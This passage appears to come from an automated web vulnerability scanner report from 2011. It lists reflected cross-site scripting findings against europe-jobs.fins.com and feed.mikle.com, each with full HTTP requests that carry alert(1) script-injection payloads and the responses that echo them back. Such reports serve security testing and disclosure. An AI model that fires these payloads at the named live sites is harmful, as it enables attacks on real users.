Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/JavaScript
Content-Length: 322
Date: Wed, 07 Sep 2011 12:21:51 GMT
Server: Test & Target

mboxFactories.get('default').get('mboxCookieReader19297<script>alert(1)</script>711c5156631',0).cancelTimeout();mboxFactories.get('default').get('mboxCookieReader19297<script>alert(1)</script>711c5156
...[SNIP]...

1.54. http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://europe-jobs.fins.com
Path:   /Jobs/125415/FX-Sales-Specialist

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44b8b'%3b0e868ba3cf5 was submitted in the REST URL parameter 2. This input was echoed as 44b8b';0e868ba3cf5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/12541544b8b'%3b0e868ba3cf5/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD HTTP/1.1
Host: europe-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:35:19 GMT
Content-Length: 50860


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://europe-jobs.fins.com/Jobs/12541544b8b';0e868ba3cf5/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&JobId=12541544b8b';0e868ba3cf5&JobName=FX-Sales-Specialist';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
...[SNIP]...

1.55. http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://europe-jobs.fins.com
Path:   /Jobs/125415/FX-Sales-Specialist

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34c8c'%3be375a52b194 was submitted in the REST URL parameter 3. This input was echoed as 34c8c';e375a52b194 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/125415/FX-Sales-Specialist34c8c'%3be375a52b194?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD HTTP/1.1
Host: europe-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:35:54 GMT
Content-Length: 63879


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist34c8c';e375a52b194?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&JobId=125415&JobName=FX-Sales-Specialist34c8c';e375a52b194';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='ht
...[SNIP]...

1.56. http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist [cobrand parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://europe-jobs.fins.com
Path:   /Jobs/125415/FX-Sales-Specialist

Issue detail

The value of the cobrand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26505'-alert(1)-'116ee732501 was submitted in the cobrand parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/125415/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD26505'-alert(1)-'116ee732501 HTTP/1.1
Host: europe-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:33:48 GMT
Content-Length: 62001


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD26505'-alert(1)-'116ee732501&JobId=125415&JobName=FX-Sales-Specialist';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
if ( typeof(OB_Script)!='undefined'
...[SNIP]...

1.57. http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://europe-jobs.fins.com
Path:   /Jobs/125415/FX-Sales-Specialist

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8a35'-alert(1)-'86ecb919995 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/125415/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&e8a35'-alert(1)-'86ecb919995=1 HTTP/1.1
Host: europe-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:34:40 GMT
Content-Length: 63664


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&e8a35'-alert(1)-'86ecb919995=1&JobId=125415&JobName=FX-Sales-Specialist';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
if ( typeof(OB_Script)!='undefined
...[SNIP]...

1.58. http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist [reflink parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://europe-jobs.fins.com
Path:   /Jobs/125415/FX-Sales-Specialist

Issue detail

The value of the reflink request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6051f'-alert(1)-'9f8af293c8d was submitted in the reflink parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/125415/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia6051f'-alert(1)-'9f8af293c8d&cobrand=ATD HTTP/1.1
Host: europe-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:32:55 GMT
Content-Length: 63763


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia6051f'-alert(1)-'9f8af293c8d&cobrand=ATD&JobId=125415&JobName=FX-Sales-Specialist';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
if ( typeof(OB_Script)!=
...[SNIP]...

1.59. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_css_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_css_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 321b0'><script>alert(1)</script>4de901e5125 was submitted in the rssmikle_css_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=321b0'><script>alert(1)</script>4de901e5125&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<link rel='stylesheet' type='text/css' href='321b0'><script>alert(1)</script>4de901e5125' />
...[SNIP]...

1.60. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_font_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_font_size request parameter is copied into the HTML document as plain text between tags. The payload 4b4c4<script>alert(1)</script>bf4a4e65793 was submitted in the rssmikle_font_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=144b4c4<script>alert(1)</script>bf4a4e65793&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<style type='text/css'>
body{margin:0;padding:0;}
#container{overflow:hidden;margin:0;padding:0;width:240px;height:230px;font-size:144b4c4<script>alert(1)</script>bf4a4e65793px;border:1px solid #CCCCCC;}
#header{margin:0px;padding:5px 5px 5px 5px;color:#FFFFFF;background-color:#0066FF;background-image:url(http://);}
#header .feed_title{margin:0;
...[SNIP]...

1.61. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_frame_height parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_frame_height request parameter is copied into the HTML document as plain text between tags. The payload 53eea<script>alert(1)</script>db1fb3cd0c6 was submitted in the rssmikle_frame_height parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=23053eea<script>alert(1)</script>db1fb3cd0c6&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<style type='text/css'>
body{margin:0;padding:0;}
#container{overflow:hidden;margin:0;padding:0;width:240px;height:23053eea<script>alert(1)</script>db1fb3cd0c6px;font-size:14px;border:1px solid #CCCCCC;}
#header{margin:0px;padding:5px 5px 5px 5px;color:#FFFFFF;background-color:#0066FF;background-image:url(http://);}
#header .feed_
...[SNIP]...

1.62. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_frame_width parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_frame_width request parameter is copied into the HTML document as plain text between tags. The payload 35a89<script>alert(1)</script>d16cd2cfc2d was submitted in the rssmikle_frame_width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=24035a89<script>alert(1)</script>d16cd2cfc2d&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<style type='text/css'>
body{margin:0;padding:0;}
#container{overflow:hidden;margin:0;padding:0;width:24035a89<script>alert(1)</script>d16cd2cfc2dpx;height:230px;font-size:14px;border:1px solid #CCCCCC;}
#header{margin:0px;padding:5px 5px 5px 5px;color:#FFFFFF;background-color:#0066FF;background-image:url(http://);}
#
...[SNIP]...

1.63. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_bgcolor parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_item_bgcolor request parameter is copied into the HTML document as plain text between tags. The payload 567c0<script>alert(1)</script>9c40e50b23f was submitted in the rssmikle_item_bgcolor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2567c0<script>alert(1)</script>9c40e50b23f&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
or:#FFFFFF;text-decoration:underline;}
#header .feed_title a:active{color:#FFFFFF;text-decoration:none;}
#content{margin:0px;padding:5px 0px 0px 0px;background-color:#C6D0D2567c0<script>alert(1)</script>9c40e50b23f;background-image:url(http://);}
#content .feed_item{margin:0 0 7px 0;padding:0 0 7px 0;border-bottom:1px dashed #CCCCCC;}
#content .feed_item_title{margin:1px 0 1px 3px;pad
...[SNIP]...

1.64. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_bgcolor parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_item_bgcolor request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6dc9'%3balert(1)//25f736e5d37 was submitted in the rssmikle_item_bgcolor parameter. This input was echoed as f6dc9';alert(1)//25f736e5d37 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2f6dc9'%3balert(1)//25f736e5d37&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
